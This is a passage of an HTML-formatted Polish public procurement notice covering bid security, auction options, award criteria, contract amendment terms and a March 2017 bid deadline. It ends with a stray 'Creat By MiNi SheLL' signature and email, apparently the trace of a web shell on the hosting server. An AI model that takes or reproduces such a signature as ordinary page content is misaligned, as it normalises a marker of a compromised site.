      Przedsiębiorczości (Dz. U. z 2016r.poz. 359)
4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w rozdz. VIII. 3.1) niniejszej SIWZ, przed upływem terminu składania ofert (tj. Przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert)
5. Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Jeżeli w innej w formie niż pieniądz oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia                                  w ofercie. 
6.  Z treści gwarancji/poręczenia musi jednoznacznie wynikać nieodwołalne i bezwarunkowe                na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium                                        w okolicznościach określonych w art. 46 ust 4a I 5 ustawy PZP.
 7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy zostanie odrzucona.
8. Do okoliczności i zasad dot. zwrotu, zatrzymywania wadium zastosowanie będą mieć                          art. 45-46 ustawy PZP.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie</td><td>30</td></tr><tr><td>Dodatkowe osoby</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">1.	Do umów w sprawach zamówień publicznych stosuje się przepisy Ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny, jeżeli przepisy ustawy P. z. p. nie stanowią inaczej.
2.	Umowa wymaga, pod rygorem nieważności, zachowania formy pisemnej chyba, że przepisy odrębne wymagają formy szczególnej.
3.	Wszelkie zobowiązania wynikające z realizacji przedmiotu zamówienia, a spoczywające                            na wykonawcy oraz zamawiającym zawiera projekt umowy, stanowiący Załącznik Nr 2                         do SIWZ 
</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Nie dotyczy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z art. 144 ustawy Prawo zamówień  publicznych Zamawiający  przewiduje możliwość zmiany zawartej umowy, jeżeli dotyczy ona:
  1)    zmiany terminu realizacji przedmiotu umowy w sytuacji:
    a)  wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy;
   b)  zaistnienia po zawarciu umowy siły wyższej, przez którą należy rozumieć zdarzenie nagłe i nieprzewidywalne lub takie któremu z zachowanie najwyższej staranności                     nie dało się zapobiec lub zniweczyć jego skutków.
  2) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron w tym ustawowej zmiany stawki podatku VAT w trakcie realizacji przedmiotu zamówienia.
6.  Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie oraz podpisanie przez strony protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności wymienionych w ust. 2. Protokół konieczności będzie załącznikiem do aneksu mieniącego niniejszą umowę.
7.  Termin powiadomienia o konieczności wprowadzenia zmian w zawartej umowie nie może nastąpić później niż 10 dni kalendarzowych od zaistnienia okoliczności uzasadniających zmiany w umowie.
8.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy PZP w szczególności :
      zmiana danych teleadresowych, zmiany osób reprezentujących  oraz wskazanych                             do kontaktu miedzy stronami.
9.  W trakcie trwania umowy Wykonawca zobowiązuje się do pisemnego powiadomienia Zamawiającego  o :
  1)  zmianie siedziby lub nazwy firmy;
  2)  zmianie osób reprezentujących;
 3)  ogłoszeniu o upadłości;
 4)  ogłoszeniu o likwidacji;
 5)  zawieszeniu działalności;
 6)  wszczęciu postępowania układowego, w którym uczestniczy Wykonawca
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/03/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com